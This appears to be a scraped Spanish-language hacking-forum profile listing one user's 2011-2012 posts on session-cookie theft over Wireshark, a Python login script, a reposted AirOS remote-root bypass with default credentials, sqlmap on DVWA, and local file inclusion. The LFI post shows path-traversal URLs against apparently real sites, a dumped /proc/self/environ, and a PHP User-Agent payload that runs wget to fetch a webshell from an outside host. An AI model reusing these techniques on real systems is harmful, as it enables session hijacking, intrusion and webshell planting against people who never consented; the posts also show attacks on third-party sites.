con que nos sorprenderán esta vez???
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Hacking / robo de cookies con wireshark y sesion de facebook
12 Marzo 2012, 13:50 PM
En esta ocasión, uso la herramienta wireshark para robar la cookie de una sesión facebook, para poder hacer esto, tenemos que estar en la misma red que nuestra victima, ademas, una vez robada la cookie, tenemos que usara, no sirve para usar mas tarde.
Uso la herramienta live HTTP header para modificar la cookie, quiero decir: que cambio la que mande mi navegador por la que uso la victima.
[youtube=425,350]http://www.youtube.com/watch?v=ISJUacTFJtY&list=UUMcniGC9L2QuudUU_cslf2g&index=2&feature=plcp[/youtube]
[youtube=425,350]http://www.youtube.com/watch?v=RRvNlu03SAc&list=UUMcniGC9L2QuudUU_cslf2g&index=1&feature=plcp[/youtube]
Uso la herramienta live HTTP header para modificar la cookie, quiero decir: que cambio la que mande mi navegador por la que uso la victima.
[youtube=425,350]http://www.youtube.com/watch?v=ISJUacTFJtY&list=UUMcniGC9L2QuudUU_cslf2g&index=2&feature=plcp[/youtube]
[youtube=425,350]http://www.youtube.com/watch?v=RRvNlu03SAc&list=UUMcniGC9L2QuudUU_cslf2g&index=1&feature=plcp[/youtube]
#23
Scripting / HTTPBasicAuthHandler() me tiene loco
3 Enero 2012, 19:42 PM
Estoy aprendiendo Python, y necesito ayuda. Tengo este código:
siguiendo esta guía: 20.6. urllib2 ? extensible library for opening URLs — Python v2.7.2 documentation
Pero algo estoy haciendo mal, porque no obtengo los resultados deseados.
El objetivo de este programa es pasar los datos user y pass de la autentificacion de administrador joomla, que tengo en mi pequeño laboratorio de casa, y que esta me abra una nueva ventana con la pantalla del panel de control, osea, con el admin ya identificado.
para esta parte uso:
como cambio google por la url que necesito
http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php
este es el fallo que me devuelve:
NOTA: la "^" en el mensaje original, esta situada debajo de la "i" de "uri="
Código [Seleccionar]
#!/usr/bin/python
import urllib2, urllib, os
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='' uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/', user='admin', passwd='123456')
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
respuesta = urllib2.urlopen('http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/')
os.system("firefox http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php")siguiendo esta guía: 20.6. urllib2 ? extensible library for opening URLs — Python v2.7.2 documentation
Pero algo estoy haciendo mal, porque no obtengo los resultados deseados.
El objetivo de este programa es pasar los datos user y pass de la autentificacion de administrador joomla, que tengo en mi pequeño laboratorio de casa, y que esta me abra una nueva ventana con la pantalla del panel de control, osea, con el admin ya identificado.
para esta parte uso:
Código [Seleccionar]
import os
os.system("firefox www.google.com")como cambio google por la url que necesito
http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php
este es el fallo que me devuelve:
Citarruben@coyote:~/UBNT$ ./boa.py
File "./boa.py", line 7
auth_handler.add_password(realm='' uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/';, user='admin', passwd='123456')
^
SyntaxError: invalid syntax
NOTA: la "^" en el mensaje original, esta situada debajo de la "i" de "uri="
#24
Noticias / 0day en AirOS (Acceso como Root)
28 Diciembre 2011, 19:58 PM
0day en AirOS (Acceso como Root)
AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).
trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt
http://www.airos.com/descargas/manuales/guideAirosLinux.pdf
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf
fuente:http://www.blackploit.com/
CitarAirOS remote root 0day
since some genius decided to write worm for this, here is early santa for you, kids:
1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?
IRCNet opers: expect some decent KNB bot mayhem for a while
AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).
trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt
http://www.airos.com/descargas/manuales/guideAirosLinux.pdf
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf
fuente:http://www.blackploit.com/
#25
Hacking / Re: sqli en dvwa
26 Diciembre 2011, 17:14 PMCitarLa aplicación recibe un identificador numérico y devuelve qué usuario dispone de ese identificador. Por ejemplo, si introducimos un '1' como "user id" la aplicación nos devolverá 'admin'. La aplicación realiza la siguiente consulta SQL sobre la base de datos, "SELECT first_name, last_name FROM users WHERE user_id = '$id'", recibiendo como parámetro el user_id. En el caso de no realizar un buen tratamiento del identificador un atacante podrá realizar una inyección SQL.
fuente:http://www.pentester.es/2010/03/sqlmap-inyeccion-sql-automatica.html
#26
Hacking / sqli en dvwa
26 Diciembre 2011, 01:40 AM
dvwa = http://www.dvwa.co.uk/
una aplicación vulnerable, con todo tipo de fallas para que juguemos
[youtube=425,350]http://www.youtube.com/watch?v=vntfwkFfgD0[/youtube]
aquí muestro como hacer sqli con sqlmap usando la opción cookie
una aplicación vulnerable, con todo tipo de fallas para que juguemos
[youtube=425,350]http://www.youtube.com/watch?v=vntfwkFfgD0[/youtube]
aquí muestro como hacer sqli con sqlmap usando la opción cookie
#27
Nivel Web / Re: ayuda con LFI
13 Diciembre 2011, 21:44 PM
Esto es lo que conseguido de momento
[youtube=425,350]http://www.youtube.com/watch?v=vKuuN3vPsQg&feature=player_embedded[/youtube]
[youtube=425,350]http://www.youtube.com/watch?v=vKuuN3vPsQg&feature=player_embedded[/youtube]
#28
Nivel Web / Re: Relato de una intrusión - Un miserable LFI
12 Diciembre 2011, 19:23 PMCitaren ese caso sigue intentando por otro medio.
no sse cuales son los otros medios, puedes ayudarme, dame una explicacion o una direccion para poder aprender esas tecnicas.
gracias
#29
Nivel Web / ayuda con LFI
11 Diciembre 2011, 23:27 PM
Tengo un par de web que son vulnerables a LFI. Puedo ver varios archivos como:
pero no puede ver
etc/self/environ
porque?
En otra web que si puedo verlo:
cuando sustituyo el campo USER-AGENT con live http header, para subir una webshell
esta opcion me aparece vacia an la ventana del firefox, y cuando trato de ir a la webshell, no esta.
Alguien puede explicarme el porque?
estoy haciendo algo mal? (aparte de lo obvio)
Citarhttp://www.xxxxxx.com/index.php?XXX=%2F..%2Fetc%2Fpasswd%00
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fetc%2Fgroup%00
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fnet%2Farp
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fcpuinfo
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fpartitions
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fversion
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2F1%2Fmounts
pero no puede ver
etc/self/environ
porque?
En otra web que si puedo verlo:
CitarDOCUMENT_ROOT=/home/*********/public_html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=TIS-620,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.***************.com.pt�HTTP_KEEP_ALIVE=115�HTTP_USER_AGENT=AQUI DEBE IR LA SHELL�PATH=/bin:/usr/bin�QUERY_STRING=content=*******/*******.php/../../../../../../proc/self/environ�REDIRECT_STATUS=200�REMOTE_ADDR=***.***.***.***�REMOTE_PORT=47433�REQUEST_METHOD=GET�REQUEST_URI=/*****.php?**********=***/*****.php/../../../../../../proc/self/environ�SCRIPT_FILENAME=/home/******/public_html/index.php�SCRIPT_NAME=/index.php�SERVER_ADDR=***.***.***.***�SERVER_ADMIN=webmaster@**********.com.**�SERVER_NAME=www.***********.com.**�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=�
SERVER_SOFTWARE=Apache�UNIQUE_ID=**************_****�
cuando sustituyo el campo USER-AGENT con live http header, para subir una webshell
Código [Seleccionar]
<?system ('wget http://rutadeunawebshell.com/shell.txt -o shell.php');?>esta opcion me aparece vacia an la ventana del firefox, y cuando trato de ir a la webshell, no esta.
CitarNot Found
The requested URL /shell.php was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Alguien puede explicarme el porque?
estoy haciendo algo mal? (aparte de lo obvio)
#30
Nivel Web / Re: Relato de una intrusión - Un miserable LFI
11 Diciembre 2011, 19:44 PM
pido disculpas, leer dos veces antes de contestar.
